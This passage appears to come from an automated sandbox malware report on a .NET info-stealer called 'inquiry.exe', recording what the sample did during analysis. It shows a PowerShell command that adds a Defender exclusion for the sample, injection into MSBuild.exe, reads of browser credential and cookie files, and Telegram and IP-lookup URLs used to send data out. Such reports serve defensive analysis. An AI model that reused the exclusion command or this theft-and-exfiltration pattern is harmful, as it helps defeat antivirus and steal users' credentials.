                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_054C97B0 LdrInitializeThunk,10_2_054C97B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: inquiry.exe, --.csReference to suspicious API methods: LoadLibrary(_FBC4_FD49_065C_FBC9_06E3(_060A_FD91_FD47_FD3E._0652))
                    Source: inquiry.exe, --.csReference to suspicious API methods: GetProcAddress(intPtr, _FBC4_FD49_065C_FBC9_06E3(_060A_FD91_FD47_FD3E._FD4B_FBBC_FDEE))
                    Source: inquiry.exe, --.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)array.ToArray().Length, 64u, out var _066A_FD4B_0619_0618)
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8D4008Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeQueries volume information: C:\Users\user\Desktop\inquiry.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Users\user\Desktop\inquiry.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                    Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                    Source: Amcache.hve.15.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR
                    Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR
                    Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100a1f08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API
                    1
                    DLL Side-Loading
                    311
                    Process Injection
                    21
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    121
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    1
                    Web Service
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    41
                    Virtualization/Sandbox Evasion
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
                    Process Injection
                    Security Account Manager41
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares1
                    Data from Local System
                    3
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets1
                    System Network Configuration Discovery
                    SSHKeylogging24
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    File and Directory Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
                    System Information Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518503 Sample: inquiry.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 28 reallyfreegeoip.org 2->28 30 api.telegram.org 2->30 32 5 other IPs or domains 2->32 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 50 12 other signatures 2->50 8 inquiry.exe 1 3 2->8         started        signatures3 46 Tries to detect the country of the analysis system (by using the IP) 28->46 48 Uses the Telegram API (likely for C&C communication) 30->48 process4 signatures5 52 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->52 54 Writes to foreign memory regions 8->54 56 Allocates memory in foreign processes 8->56 58 3 other signatures 8->58 11 MSBuild.exe 15 2 8->11         started        15 powershell.exe 23 8->15         started        17 WerFault.exe 19 16 8->17         started        20 MSBuild.exe 8->20         started        process6 dnsIp7 34 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 11->34 36 checkip.dyndns.com 158.101.44.242, 49700, 49708, 49710 ORACLE-BMC-31898US United States 11->36 38 2 other IPs or domains 11->38 60 Tries to steal Mail credentials (via file / registry access) 11->60 62 Tries to harvest and steal browser information (history, passwords, etc) 11->62 64 Loading BitLocker PowerShell Module 15->64 22 WmiPrvSE.exe 15->22         started        24 conhost.exe 15->24         started        26 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->26 dropped file8 signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    inquiry.exe37%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    inquiry.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    http://upx.sf.net0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    http://varders.kozow.com:80810%URL Reputationsafe
                    http://aborters.duckdns.org:8081100%URL Reputationmalware
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                    http://anotherarmy.dns.army:8081100%URL Reputationmalware
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    https://www.office.com/lB0%Avira URL Cloudsafe
                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                    https://api.telegram.org0%Avira URL Cloudsafe
                    https://www.office.com/0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                    https://www.office.com/P0%Avira URL Cloudsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                    http://ftp.fastestpay.digital0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a0%Avira URL Cloudsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=enlB0%Avira URL Cloudsafe
                    https://chrome.google.com/webstore?hl=enP0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    199.232.210.172
                    truefalse
                      unknown
                      ftp.fastestpay.digital
                      192.64.117.204
                      truetrue
                        unknown
                        reallyfreegeoip.org
                        188.114.96.3
                        truetrue
                          unknown
                          api.telegram.org
                          149.154.167.220
                          truetrue
                            unknown
                            checkip.dyndns.com
                            158.101.44.242
                            truetrue
                              unknown
                              checkip.dyndns.org
                              unknown
                              unknowntrue
                                unknown
                                time.windows.com
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/8.46.123.33false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://checkip.dyndns.org/true
                                  • URL Reputation: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/chrome_newtabMSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.orgMSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/botinquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.office.com/PMSBuild.exe, 0000000A.00000002.3761177777.0000000002AE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
